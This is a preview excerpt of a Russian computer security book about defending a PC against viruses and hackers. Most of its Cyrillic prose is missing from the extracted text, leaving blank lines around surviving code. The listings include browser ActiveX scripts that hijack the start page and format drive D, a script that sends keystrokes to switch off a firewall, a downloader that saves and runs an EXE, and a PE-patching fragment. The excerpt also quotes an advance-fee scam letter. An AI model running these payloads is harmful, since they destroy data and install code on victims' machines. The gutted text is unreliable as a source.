    100%    
  


,                        (   ,  ,    . .).   ,            .        ,     ,      . ? ?  ,       .                     ,          . ,         .   ,          ,    .            ,     ,  -,     ,      .





  







    ,      .

     ,  "",       ,  ,         .

 







 !  ,      ,             .         ,  ,   ,    . , , !         ,      .

          ,     .    ,        ,                    ?

 ,     ,        ,    . "     ",          ,      ,  ,       .

                         .

  ,  ,   ,       ,    ,  ,    .               .

       .         ,     .         ,      .

       .                       .

  ,        ,   .





 ,   ,    .           .





 


 ,         dgurski@minsk.piter.com ( ,  ).

     !

   http://www.piter.com       .




 1

  



?       ?

?   

?    

?    -

          ,     .          -,             .        .




1.1.       ?



,     (         Windows)     ;    ( ,    ,      ),      !

   ?    .







   ?  , ,   .   -?     ?.

   ?  ""    ,          .

, ,         ,       .     :   ,  ,  , , -   -    ,       ,    .

      .      .   " "     ,    .      .

 ,            (   , ),  ""  ,     ,       .   ,      .

   !   ,    -        ,         .  .

                   -     .       /    .      !

 1.    ,         ,        EXE-,  HTML-.    ?

          ActiveX-. ,       ( 1.1).

 1.1.    

<APPLET ID="Sh1 "

CLASSID="CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B">

</APPLET>

<script>

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://fuckofflamers.ru");

</script>

 2.  :  HTML-,  ,   . ?   !       ( 1.2).

 1.2. HTML-,   D:

<script>

a=new ActiveXObject("WScript.Shell");

a.run("cmd /c format d:/y",0);

</script>

 ,    HTML-,       ,   .

  .

 3.  ,      Counter Strike   .        .

 4.       ( EXE-,        ),    PE- ( EXE-,   ;    PE-      )     ( 1.3).

 1.3.     PE-

_PtchImSz:

mov eax, [esi + 0Ch] ; VirtualRVA(Last section)

add eax, [esi + 08h] ; VirtualSize(Last section)

mov [edi + 50h], eax

 5.     ,    .

.   .   ,          .







   ?

,  ,   .   !    - ?     ,     ,      !    . Agnitum, Zone Alarm    .

,    .   ,   ?

 1.        (,  ),        ,         .          ,          .    JavaScript ( 1.4)   , 

 1.4.      (  Agnitum)

set WShell = CreateObject("WScript.Shell")

WShell.Exec " Files\Agnitum\Outpost Firewall\outpost.exe"

WScript.Sleep 200

WShell.AppActivate "Agnitum", TRUE

WScript.Sleep 100

WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"

WScript.Sleep 100

WShell.SendKeys "{ENTER}"





           "-" (. 1.1)!





. 1.1.   7.0        

 2.  ,   :    ,     80-    !  ( 1.5)      ActiveXObject.    7.0   . 1.2.




. 1.2.       

 1.5.   IE  ActiveXObject!

<script>

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.OpenC'GET', "http://www.example.com/1.exe", 0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;

s.Type = 1;

s.Open();

s.Write(x.responseBody);

s.SaveToFile("C:\\example.exe", 2);

</script>

<script language="javascript">

function preparecode(code)

{ result = "";

lines = code.split(/\r\n/);

for (i=0; i<lines.length; i++) {

line = lines[i];

line = line.replace(/*\s+/,"");

line = line.replace(/\s+$/,"");

line = line.replace(/'/g,"\'");

line = line.replace(/[\\]/g,"\\");

line = line.replace(/[/]/g,"%2f");

if (line != '') {

result += line +'\\r\\n';

}

}

return result;

}

function doit() {

mycode = preparecode(document.all.code.value);

myURL = "file:javascript:eval(" +mycode + "')";

window.open(myURL, "_media");

}

setTimeout("doit()", 5000);

</script>

</html>

 3.  ,       .       , ,   LSASS (Local Security Authority Sub System).       Windows ,      .     , ,   .

  ,      :   .

, !  ,   ,     (   , , ),   ,    "" .

   ,  ""   ,     ( 1.6).  HTML-,    ,    ,     ,        .

 1.6.   

<HTML>

OBJECT CLASSID='CLSID:10000000'

CODEBASE='C:\Windows\system32\logoff.exe'>

</OBJECT>

<HTML>





 ,   ,   ,     (  ,   )     .


       ?    ,      ,   ? , ,           (   UNIX-,          ),       ,  ! ?    .

,  ,    ,    DepLoit  GetAdmin  ,    ,     www.securityLab.ru.

  ,     run as (,         ),     ""      . ""      .

 ,        ,         ,     ,     .    ,  ,     !




1.2.   


        ,  ,        ,     ,            .

,   ()     ,           .

  ,    ,          ,     ,      .

    ,       :

? ;

? ;

? .

         (,    ""     ).

             (,           ,        ,   ).

       ,   (,      ,   ,    ,    ).

     ,   ,    ,     ,        .

   (  )    .       : D, ,   .      D          .        C1, C2, 1, 2  .            ,      .

        BS 7799 "  .  ",       ISO/IEC 17799:2005, ,   ,     ISO/IEC 27001.

  ,         ,   .

,   ( . security policy)    ,   ,      /    ,      .

         .

           :

?       (, ,  ,  );

?      ;

?              ( );

?         ( );

?        (, , , )        .

      , ,  ,      .

 ,       ,   ?            (. 1.1).

 . 1.1   ,         (  ).

   ,     :

? ;

? ;

? .

 1.1.   (  NIST "Risk Management Guide for Information Technology Systems")




 ,        ,         .





   ,    /        ,        .           !


 ,        .            :

?  ;

? ,   (     ).

            , ,    ,        .




1.3.    



        .   ,   ,  (,       )   DDoS- (Distributed Denial of Service           -)    -    ,     .          ,        ,   -,  -,  ,   ,   ,     ,     .




,        


        :         ,    ,    .  :    ,   ,     .   :   ,  ,    .    .

,      ,         ,      .        , ,  ,      .   - .

   IT-            ,    Open Source-    ,       .       ,                .         Open Source-          60    .  ,  Open Source--     ,      .

         ?  .   , ,       ,     .    ( )                 .      ,     (, CodeRed, Slammer, Lovesan)  .          DDoS-,     .

         www.securityLab.ru.           (, )        .             .        KaHt,     DCOM RPC (    -).     SMBdie   ,         (. 1.3).

        .  :            ,       .   ,    ,  ,         .

         -.         ,    .          (HEAD),   IP       ,    .            .




. 1.3.  SMBdie  




-


    -,      . ,  ,   ,  -,          ,    .  , ,  ,           .

       -   ,         .  ,           -.

    -      . ,   ,        ,   ,        .

"FROM MR USMAN KAMAL

BILL AND EXCHANGE MANAGER

BANKOF AFRICA (BOA) OUAGADOUGOU BURKINA FASO".

    ,    .

  ,   .     .  .

!       ,   ,   "OUAGADOUGOU"!  , , -,   ?

  .   Lingvo, "OUAGADOUGOU"    ,        . " "BURKINA FASO"?  ?"  . -      !

 .

CONFIDENCIAL

,  : , , .

DEAR FRIEND, I AM THE MANAGER OF BILL AND EXCHANGE AT THE FOREIGN REMITTANCE DEPARTMENT OF BANK OF AFRICA (B.O.A) HERE IN OUAGADOUGOU, BURKINA FASO.

  (     ),             .

IN MY DEPARTMENT WE DISCOVERED AN ABANDONED SUM OF $25 000 000 (TWENTY FIVE MILLION UNITED STATE DOLLARS) IN AN ACCOUNT THAT BELONGS TO ONE OF OUR FORIEGN CUSTOMER (MR. ANDREAS SCHRANNER FROM MUNICH, GERMANY) WHO DIED ALONG WITH HIS ENTIRE FAMILY IN JULY2006 IN A PLANE CRASH.

 :  ,   (, ,   ),   , ,  (  )   $25 .       ANDREAS SCHRANNER  ,      2006        .

http://news.bbc.co.uk/1/hi/world/europe/859479.stm

(   , ,       )

,   .   , ,  ,      25   ?    ,     .   ?        . ,    .

"SINCE WE GOT THE INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT, UNLESS SOMEBODY APPLIES FOR THE NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDING AND LAW BUT UNFORTUNATELY WE LEARNT THAT HIS NEXT OF KIN DIED ALONG

WITH HIM IN THE PLANE CRASH.

THE BANKER GUIDELINE HERE A RESPONSABLE PERSON, AND WHO THE BANK CAN INTROSSTED THIS TREASURY AS UNCLAIMED FUND.

THE RESQUEST OF FORIEGNER AS NEXT OFKININHIS BUSINESS IS OCCASSIONED

BY THE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A BURKINABE

CANNOT STAND AS NEXT OF KIN TO A FOREIGNER".

           ,   -    ,   ,       .     (       ,    !)   .

     :        ""  ,  ?  :     ,     ,      .

I AGREE THAT 30% OFTHIS MONEYWILL BE FOR YOU AS A RESPECT TO THE PROVISION OF A FOREIGN ACCOUNT.

     .  USMAN KAMAL   30 %  ,   ,       7  500 .   (!).

"10 % WILL BE SET ASIDE FOR ANY EXPENSES INCURRED DURING THE BUSINESS AND 60 % WOULD BE FOR ME.

HEREAFTER, I WILL VISIT YOUR COUNTRY FOR DISBURSEMENT ACCORDING TO THE PERCENTAGE INDICATED THEREFORE, TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS ARRANGED".

10 %      "" ,  60 %   .            ,    .

"YOU MUST APPLY FIRST TO THE BANK AS RELATION OR NEXT OF KIN OF THE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE NUMBER AND YOUR FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHERE IN THE MONEY WILL BE

REMITTED".

    30 %    ,    ,  :        ,     ,       .

"UPON RECEPIT OF YOUR REPLY, I WILL SEND TO YOU BY FAX OR EMAIL THE TEXT OF APPLICATION^

       ,          ,      .

I WILL NOT FAIL TO BRING TO YOUR NOTICE THIS TRANSACTION IS HITCH-FREE AND THAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED ARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER.

 ,               .

"YOU SHOULD CONTACT ME IMMEDIATELY AS SOON AS YOU RECEIVE THIS

LETTER.

TRUST TO HEAR FROM YOUIMMEDIATELY".

    .

YOURS FAITHFULLY MR USMAN KAMAL.

  ,   .





   3 %  ,   ,    .





  


                .        -  XSpider, Essential Net Tools, Net Bios Scaner   ,   ,    (. 1.4).

  ,     .          (. root   "", " ";    )   ,     .       ""          (,     (root kit), ,    ,     ;     ).




. 1.4.  XSpider  

    :          .

          (  www.virusList.com),           :

? "AFXRootkit 2005   Open Source-,   Delphi;  code injection  hooks Windows native API    , modules, handles, files, ports, registry keys  . .";

? "FU Rootkit: FU   ,   ,  Windows Event Viewer,    !      (!).     - ".

            ,           .      "  7.0" (. 1.5).




. 1.5.    




    , ,  


    :    (EXE, COM),     , - ,     . .

               .

 ,    ,     ,          .        :        "" ,  ,      ,       ""  ,    (  backdoor  ),   - (, ),    DDoS  . .

               ,        ( www.viruslist.com).

"A-311 Death Full ()   ,       .    :

?     -  ;

?    ;

?   ;

?       : , ,    ,   ;

?  /    ( refresh),            WAV-    (             ),        -;

?      , /  ,   ( Windows 2000/XP    SYSTEM,    ): , ,    ;

? / / ;

?   CMOS;

?    / ". ,  , .





   .             .


   ,   ,     :        ,        .       :     .         ,        -.




     (DoS)      (DDoS)


   DDoS-         .  :    ,     (   )   ,  ,       .    ,     ?

                 ,   .

    DoS  DDoS    ? , ,                -  .             (    ,     " ", . . 1.2)        .     .

UDP flood   ,      -     UDP (User Datagram Protocol     TCP,      ,    ,     ).         :  UDP--     ,       TCP  UDP       -.

ICMP flood    ICMP- (Internet Control Message Protocol        TCP/IP,         .   ICMP   Ping      TCP/IP).

   ICMP,         Smurf,   - ICMP              .   Smurf-   Smurf--     .            . ,    -,    ,     (, ,    ).          , ,   ,     .

TCP SYN Flood  ,       TCP--  ,      .     SYN-  .      SYN-,  SYN-ACK- .     ,   ACK,       .  ,      (SYN-ACK)  ,      ACK,   .  ,  ,     ,     ,   , .        ,   ,   .

 Ping of Death          IP-. TCP/IP      65  (  20    IP-,        ,   ).  Ping of Death   ,    .

Tribe Flood Network (TFN)  Tribe Flood Network 2000 (TFN2K)    ,    DoS-        .  TFN-       IP- .    :           TFN-  .      DoS-     IP- . IP-         ,    .

   DDoS-        .   TFN  TFN2K      : Smurf, UDP flood, ICMP flood  TCP SYN flood,        .           ,       .

     TFN  TFN2K          ,    ,       .

    DoS-    Stacheldracht (  ). Stacheldraht      DoS-,    TFN,        Stacheldraht    .                 .    ,             .

 IP spoofing ( IP-)    DoS, ,   ,     ,      IP,       DDoS.

 MAC spoofing.    MAC-.     ,  ,       ,        MAC-.    .

         MAC-  12-  .       ,      IP-       -     MAC.     ,     MAC-,  ,    "     ".

         ARP,        TCP/IP,   IP-   MAC   IP.         ,     MAC/IP  ARP-.     ARP-     ARP-.     ,     ,   ARP-   ff:ff:ff:ff:ff:ff (, ).

  ARP ,         ARP-.          SMAC  MAC SPOOFER 2006 (. 1.6).




. 1.6.  MAC SPOOFER  

Password attacks (   )    :  ,  Brute Force      . 񻠖      ,       :  ,   FTP, SAM-, PWL-, UIN  . .         ,     .           .

Packet sniffers  ,        (       ,    ),     ,    .            . ,          (telnet, FTP, SMTP, POP3  . .),        ,     .




1.4.    -



        ,       (. . 1.2)   ,  .            ,   .       ,  ,      .

            ,     ,       :   - ,       ,      .        ,   -           .              .    ,   ,      ,     .    SANS,  EEYE,    SecurityLab,    :   ,   .

          -,            -.      .       -       ,  .   ,  " " (Parameter Tampering), "-  " (Cross-site Scripting)  " " (Cookie Poisoning) (-,  ),  ,          .         ,       .

    -   ,        .         ,       .     -       IT.

     ,    ,  ,       ,    ,   .           ,       ,     .       ,    .     Web Application Security Consortium,              (www.webappsec.org).

      ,         ,    .




 


    .      (1; 2 . .)    (1); 2)  . .).        ,    .

1.  (Authentication):

1)  (Brute Force);

2)   (Insufficient Authentication);




  .


   .

   ,     (https://www.litres.ru/oleg-boycev/zaschiti-svoy-komputer-na-100-ot-virusov-i-hakerov/)  .

      Visa, MasterCard, Maestro,    ,   ,     ,  PayPal, WebMoney, ., QIWI ,       .


